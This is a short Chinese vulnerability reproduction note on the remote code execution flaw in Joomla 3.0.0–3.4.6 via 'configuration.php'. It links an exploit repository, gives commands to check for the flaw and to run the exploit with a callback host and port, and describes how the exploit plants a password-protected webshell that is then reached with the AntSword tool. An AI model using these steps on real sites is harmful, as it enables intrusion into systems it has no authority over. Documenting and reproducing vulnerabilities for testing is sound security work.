Joomla_3.4.6_-_’configuration.php’_Remote_Code

# Joomla 3.4.6 – ‘configuration.php’ Remote Code Execution

===

一、漏洞简介
————

Joomla 3.4.6 – \’configuration.php\’ Remote Code Execution

二、影响范围
————

Joomla 3.0.0 至 3.4.6

三、复现过程
————

https://github.com/ianxtianxt/Joomla-3.4.6\-\–configuration.php-Remote-Code-Execution

### 脚本验证

验证：

python3 test.py -t http://127.0.0.1:8080/

![](/static/qingy/Joomla_3.4.6_-_’configuration.php’_Remote_Code_Execution/img/rId25.png)

显示”Vulnerable”证明存在漏洞

利用：

python3 test.py -t http://127.0.0.1:8080/ –exploit –lhost 192.168.31.126 –lport 2121

![](/static/qingy/Joomla_3.4.6_-_’configuration.php’_Remote_Code_Execution/img/rId26.png)

执行成功

并在”configuration.php”写入**随机密码**的一句话木马![](/static/qingy/Joomla_3.4.6_-_’configuration.php’_Remote_Code_Execution/img/rId27.png)上图的密码为：kyevgbxjmwivdvegohfzwuukuzswxqquthlrsollpxzgiifumi

蚁剑链接测试

![](/static/qingy/Joomla_3.4.6_-_’configuration.php’_Remote_Code_Execution/img/rId28.png)

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

Joomla_3.4.6_-_’configuration.php’_Remote_Code_Execution

请登录后发表评论

1新增沉浸式翻译插件deepl pro api共享

2一份CTFSHOW刷题总结

3用友NC-Cloud process SQL注入

4HertzBeat(赫兹跳动) 开源实时监控系统默认口令

5索贝融媒体search SQL注入

6顺景ERP GetFile任意文件读取